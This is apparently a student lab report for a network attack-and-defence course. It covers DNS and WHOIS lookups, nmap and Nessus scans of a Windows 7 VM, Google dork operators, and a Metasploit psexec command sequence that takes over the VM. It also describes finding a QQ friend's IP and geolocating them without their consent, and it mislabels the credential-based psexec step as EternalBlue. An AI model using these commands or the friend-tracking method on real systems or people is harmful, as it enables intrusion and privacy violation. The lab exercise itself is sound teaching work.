#20232321 2025-2026-1 《网络与系统攻防技术》实验五实验报告
1.实验内容
- 任务一:查询指定DNS与IP信息:查询baidu.comDNS注册人及联系方式,域名对应IP地址,IP地址注册人及联系方式,IP地址地理位置信息(要求使用WHOIS、dig、nslookup、traceroute/tracert、在线工具)
- 任务二:查询好友位置信息:获取QQ好友的IP地址查询该IP所在的具体地理位置
- 任务三:使用nmap开源软件对靶机环境进行扫描并分析
- 任务四:使用Nessus工具对靶机扫描并分析
- 任务五:个人信息安全评估
2.实验目的
掌握信息搜集技术,收集DNS信息,IP位置信息,了解Google信息筛选的关键词。在实践中会使用信息收集分析的工具,像nmap,Nessus
3.实验环境
3.1安装kali镜像的虚拟机,配置如下

3.2安装靶机win7镜像的虚拟机,配置如下

4.实验过程
4.1从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取信息
4.1.1 DNS注册人及联系方式
使用whois指令可以查看域名的DNS注册人以及联系方式
whois baidu.com
如下图所示
注册人:MarkMonitor Information Technology (Shanghai) Co., Ltd.
联系邮箱:abusecomplaints@markmonitor.com
联系电话:+1.2063895740

4.1.2该域名对应IP地址
使用dig 或 nslookup 指令查看域名对应的IP地址
Nslookup baidu.com
#或
dig baidu.com
如下图所示,虚拟机通过ip为192.168.226.2的DNS服务器的53端口来进行查询。查询得到baidu.com有2个服务器,ip分别为39.156.70.37和220.181.7.203


4.1.3 IP地址注册人及联系方式
(1)使用在线平台OneFour查询ip地址的注册人和联系方式

(2)使用whois指令查询ip的注册人和联系方式
Whois 39.156.70.37
分析下图可以知道39.156.70.37有一个注册人
ip注册人为:haijun li
联系邮箱为:abuse@chinamobile.com
联系电话为:1052686688


(3)使用相同的方法查询ip为220.181.7.203的注册人和联系方式
Whois 220.181.7.203
分析下图可以知道ip为220.181.7.203有两个注册人
注册人1:Chinanet Hostmaster
联系电话: +86-10-58501724
联系邮箱:anti-spam@chinatelecom.cn
注册人2:Hostmaster of Beijing Telecom corporation CHINA TELECOM(中国电信北京公司)
联系电话:+86-010-58503461
联系邮箱:bjnic@bjtelecom.net


4.1.4 IP地址所在国家、城市和具体地理位置
依旧使用whois指令查询ip所在国家城市和具体地理位置
- 39.156.70.37的ip
Whois 39.156.70.37
国家:中国(CN)
城市:北京市
具体地理位置:西城区金融大街 29 号,邮编 100032

- 220.181.7.203的ip
Whois 220.181.7.203
注册人1:
国家:中国(CN)
城市:北京市
具体地理位置:金融大街 31 号,邮编 100032
注册人2:
国家:中国(CN)
城市:北京市
具体地理位置:西城区西单北大街 107 号

4.1.5使用traceroute、tracert命令追踪传输过程的信息
- (1)使用
traceroute
使用ICMP追踪可以看见中间的传输的过程都加密不可见
traceroute -I baidu.com

使用TCP追踪
traceroute -T baidu.com

- (2)使用
tracert
tracert baidu.com
如下图所示结果还是不可见

4.2尝试获取BBS、论坛、QQ、MSN中某一好友的IP地址,并查询获取该好友所在的具体地理位置。
首先我们可以打开资源监视器,然后我们勾选QQ.exe监视微信相关的信息。然后我们在qq上给一个朋友发一个消息。然后我们可以在资源监视器中找到对应的IP地址,,我选择113.56.189.242的IP地址

在chaipip网站查找,可以看到朋友ip的具体位置在中国湖北省宜昌市,纬度30.732758,经度111.310981。

4.3使用nmap开源软件对靶机环境进行扫描
我选择windows 7虚拟机作为靶机,其IP地址为192.168.226.150

4.3.1 检查靶机IP地址是否活跃
使用命令nmap -sn 192.168.226.150对靶机进行ping扫描,可以看见靶机是活跃的。
nmap -sn 192.168.226.150
扫描结果显示 “Host is up”,说明该靶机IP 地址处于运行状态,网络可达。

4.3.2 检查靶机IP地址开放的端口
使用命令nmap -sS 192.168.226.150对靶机进行SYN扫描,查询靶机开放的TCP端口。
nmap -sS 192.168.226.150
- 135/tcp:是 Microsoft 远程过程调用服务端口,主要用于系统内部的进程间通信。
- 139/tcp:属于 NetBIOS 会话服务端口,用于 Windows 系统的文件和打印机共享等网络资源访问。
- 445/tcp:是 SMB 服务端口,用于文件共享、打印机共享等功能。该端口是永恒之蓝(MS17-010)等高危漏洞的攻击入口,攻击者可远程执行代码并完全控制系统。
- 3389/tcp:是远程桌面协议(RDP)端口,用于远程连接和管理 Windows 系统。

使用命令nmap -sU 192.168.226.150对靶机进行UDP扫描,查询靶机开放的UDP端口。
nmap -sU 192.168.226.150
- 123/udp:用于网络时间协议的时间同步,可能被利用进行 DDoS 攻击或信息泄露。
- 137/udp:是 NetBIOS 名称服务端口,用于网络资源名称解析,可被用于信息收集和枚举。
- 138/udp:属于 NetBIOS 数据报服务端口,支持广播通信。
- 500/udp:是 IPsec 密钥交换端口,用于 VPN 等安全连接的密钥协商。
- 1900/udp:为通用即插即用端口,用于设备发现和配置,易被利用进行端口转发或设备控制。
- 4500/udp:是 IPsec NAT 穿越端口,用于在 NAT 环境下建立 IPsec 连接,存在协议层攻击风险。
![image]()
4.3.3靶机安装的操作系统及版本
nmap -O 192.168.226.150

根据结果猜测靶机安装的操作系统可能是 Microsoft Windows 7或者Windows Server 2008 R2 或者是Windows8.1
4.3.4靶机安装的服务
nmap -sV 192.168.226.150

- 135/tcp、49152/tcp、49153/tcp、49165/tcp:Microsoft Windows RPC 服务,用于系统内部进程间通信,支持远程管理等操作,存在被利用进行远程代码执行的风险。
- 139/tcp:用于文件和打印机共享等网络资源访问。
- 445/tcp(microsoft-ds):提供 SMB 服务,是永恒之蓝(MS17-010)等高危漏洞的攻击入口。
4.4用Nessus开源软件对靶机环境进行扫描
4.4.1下载Nessus
使用kali自带的火狐浏览器打开
https://www.tenable.com/downloads/nessus?loginAttempted=true
选择Debian版本,点击Download

4.4.2配置Nessus
大家可以参考
Kali Linux Nessus详细安装步骤
4.4.3使用Nessus查看靶机上开放了哪些端口
通过https: //kali的ip:8834打开nessus->create new scan->host discovery.命命任务,基本描述、选择保存的文件夹和目标主机的ip.点击save,保存后,在选择的文件中找到并运行。


开放的端口有135,139,445,49152,49153,49162,49164,49165,49166
4.4.4靶机各个端口上网络服务存在哪些安全漏洞
重新新建一个扫描New scane->Advanced Scan,发现有2个高危漏洞,2个高危漏洞,2 个
中危漏洞,5个低危漏洞,35 个信息类漏洞


- 严重漏洞
Unsupported Windows OS (remote):远程的 Microsoft Windows 系统缺少服务包或已不再受支持,因此很可能包含安全漏洞。
Microsoft RDP RCE 漏洞(CVE-2019-0708,BlueKeep):远程主机受远程桌面协议(RDP)的远程代码执行漏洞影响。未认证的远程攻击者可通过一系列特制请求,执行任意代码。 - 高位漏洞
MS12-020 漏洞::远程 Windows 主机的远程桌面协议(RDP)实现存在任意远程代码执行漏洞。
4.4.5如何攻陷靶机环境,以获得系统访问权
此次实验我们利用MS17-010的永恒之蓝漏洞,给漏洞在windouws7中存在。
-
首先设置windows7虚拟机,关闭防火墙和安全杀毒软件等等。并通过社会工程学或之前实验的获取击键记录等等其他手段获取本机的密码。(由于我就是本虚拟机的创建者,所以我已经获取了密码)。
注意点:
(1)win7不能有MS17-010 对应的补丁编号为 KB4012212、KB4012215、KB4012216、KB4012217
可以去按下 Win + R,输入 appwiz.cpl 并回车,左侧点击 “查看已安装的更新”中查看有哪些补丁。
![image]()
(2)登录的用户要有远程访问的权限,和管理员Administrator赋予的权限
可到此电脑”→“管理”→“本地用户和组”→“用户”中查看
![image]()
-
在kali虚拟机中进行如下配置
msfconsole #启动
use exploit/windows/smb/psexec #`启用windows/smb/psexec这个更稳定的模块`
set LHOST 192.168.226.129 #攻击者kali的地址
set RHOSTS 192.168.226.150 #被永恒之蓝攻击的win7地址
set SMBUser Administrator #管理者的名字(win7 一般默认就是Administrator)
set SMBPass 你的密码 #登录密码
set LPORT 80 #端口选择80 伪装为http的端口
set TIMEOUT 60 # 等待时间提高到60s
exploit

成功获得系统访问权。

4.5搜索技能
4.5.1通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题。
-
(1)名字隐私:浏览了一下除了一些博客标注了我的名字以外,没有其他的信息泄露了
![image]()
-
(2)学号隐私:依旧是除了一些注明学号的博客以外,没有信息的泄露
-
![image]()
后面陆续对手机号和身份证号进行了查询,都没有查询到泄露问题,当然只通过浏览器进行判断有点片面了。从骚扰电话的角度来看,我个人认为我的手机号信息应该是泄露到部分人手里了。不过总的来说,我的信息没有泄露到互联网上传播。
4.5.2并练习使用Google hack搜集技能完成搜索(至少10种搜索方法)
-
1.site::限定域名搜索
功能:只搜索指定域名下的内容,用于挖掘目标网站的相关页面
案例:site:gov.cn 搜索中国政府部门的网站
![image]()
-
- inurl::URL 中包含指定关键词
功能:筛选 URL 中包含特定字符的页面,常用于寻找后台、敏感路径。
示例:inurl:admin 搜索后台登录的系统
![image]()
- inurl::URL 中包含指定关键词
-
- intitle::标题中包含指定关键词
功能:筛选网页标题中含特定词的页面,用于定位特定功能页面。
示例:intitle:"登录后台" 筛选标题含 “登录后台” 的页面
- intitle::标题中包含指定关键词

-
- filetype::指定文件类型
功能:搜索特定格式的文件,常用于寻找文档、备份文件等。
示例:filetype:pdf 搜索 PDF 类型的文件
- filetype::指定文件类型

-
5.intext::网页内容中包含指定关键词
功能:筛选网页正文(可见文本)中含特定词的页面,用于挖掘敏感信息。
示例:intext:"root@example.com" 寻找日志文件中包含 root 的内容
![image]()
-
- link::搜索链接到指定 URL 的页面
功能:查找所有包含指向目标 URL 链接的页面,用于分析网站关联关系。
示例:link:example.com → 所有链接到example.com的外部页面
- link::搜索链接到指定 URL 的页面

-
7.排除关键词(-)
功能:在搜索结果中排除含特定关键词的页面,用于精准筛选。
示例:site: admin -login → 搜索含 “admin” 但不含 “login” 的页面
![image]()
-
8.related::搜索相似网站
功能:寻找与目标网站内容或功能相似的其他网站,用于扩展信息搜集范围。
示例:related:github.com → 寻找类似 GitHub 的代码托管平台
![image]()
-
9.ext:限定搜索特定类型的网页扩展名
功能:筛选URL中显示的文件扩展名。
示例:ext:pdf 文件扩展名为pdf
![image]()
-
- cache::查看 Google 缓存的页面
功能:访问 Google 保存的网页快照,适用于目标页面已删除或暂时无法访问的情况。示例:cache:baidu.com/page.html 查看baidu页面的缓存
- cache::查看 Google 缓存的页面

5.问题及解决方案
-
问题1:在模拟永恒之蓝远程攻击虚拟机时,出现当前用户没有远程访问的权限问题

- 问题1解决方案:可以看见没有SMB通道断开等ERROR的提示符,说明就是单纯的没有权限,经过查阅发现,除了管理员用户,其他用户就算添加了管理员权限,但是有些权限还是没有需要手动添加。
按 Win+R 输入 gpedit.msc 打开组策略编辑器;在计算机配置 → Windows 设置 → 安全设置 → 本地策略 → 用户权限分配下 找到 “允许从网络访问这台计算机”并点击 “添加用户或组”,添加你要远程访问的用户。同时检查右侧 “拒绝从网络访问这台计算机”,确保你要远程访问的用户不在其中。

-
问题二:在模拟永恒之蓝远程攻击虚拟机时,还出现了模块参数不兼容的问题

依旧显示exploit启动成功,但是没有任务创立。
- 问题二解决方法:即使防火墙关闭,但是内核DEP还是可能拦截漏洞,就需要到计算机→属性→高级系统设置→高级→性能→设置→数据执行保护 中通过设置 “仅为基本 Windows 程序和服务启用 DEP”关闭内核DEP的保护,确定后重启虚拟机。
![image]()
6.学习感悟、思考等
通过此次试验我了解到网络安全攻防中信息收集技术的重要作用,也是一次将理论知识转化为实践能力的宝贵旅程。
在任务一中我掌握了通过DNS对特定官网或ip的信息收集,实践了WHOIS、dig、nslookup、traceroute/tracert、在线工具等信息收集的工具。接着我实践了通过实时的通信来获取聊天对象的位置,也让我意识到一些隐私可能会被轻易地窃取,像对于陌生的聊天请求要有警惕性。接着我们使用nmap和Nessus对特定的主机进行信息收集,从网络流量分析和安全漏洞分析两种角度见识了信息收集技术的强大功能。最后在收集到的安全漏洞,选择合适的漏洞对主机进行了远程操控的实验。并对自己的安全信息进行了评估。
实验过程中,我也对网络安全的伦理边界有了更清晰的认知。渗透测试的核心目的不是攻击破坏,而是通过模拟攻击者的视角,发现系统潜在的安全隐患,进而帮助加固防护。从扫描端口、识别漏洞到尝试利用,每一步操作都让我明白,网络安全技术是一把 “双刃剑”,唯有坚守合法合规的底线,才能让技术真正服务于安全防护。此外,结合实验中对各类服务与漏洞的分析,我也深刻体会到,网络安全防护并非一蹴而就,而是需要建立 “持续监控、及时修复、定期加固” 的长效机制,任何侥幸心理都可能导致严重的安全后果。
总的来讲,此次实验不仅提升了我对网络安全工具的操作能力,更提高了我的安全思维。我相信此次实验将为应对未来的网络安全挑战打下坚实的基础。












浙公网安备 33010602011771号